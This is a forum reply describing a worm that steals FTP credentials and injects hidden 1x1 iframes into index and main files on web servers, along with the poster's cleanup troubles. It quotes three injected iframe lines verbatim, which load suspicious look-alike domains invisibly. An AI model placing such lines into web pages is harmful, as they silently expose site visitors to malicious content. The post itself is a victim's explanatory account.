Quote:
Originally Posted by DomainMagnate
Hellas, what does the worm do?
|
First your pc get infected. Then it watchs for your username and pass for ftp (i believe when you initiate connection then it get it, not by type in).
Then it add few lines to every file on server that contain in name index, main
but I found it in some unrelated files. That files are pointed to some chinese or another sites ads or something not sure.
Here is the lines it add:
echo "<iframe src=\"http://goooogleadsence.biz/?click=B16BFB\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
echo "<iframe src=\"http://google-ana1yticz.com/?click=38951B\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
and another one
<iframe src="http://cutlot.cn/in.cgi?income49" width=1 height=1 style="visibility: hidden"></iframe>
I have one big site with over 600 index files, and I am still finding the way for removing them all. Wordpress sites are very easy to clean, but I noticed it infect few other site not just index. Some guys on joomla are selling removal tools. My Clam antivirus detects all on server but it can not repair files, just delete them, so you need to manualy remove those.
And it looks like permissions did not stop him. Every file that I (my ftp user) had right to write, are infected.
Bad thing is if you dont react google wil designate your site as "This site can harm your computer". You can imagine what that would do to your site traffic.
Linear Mode
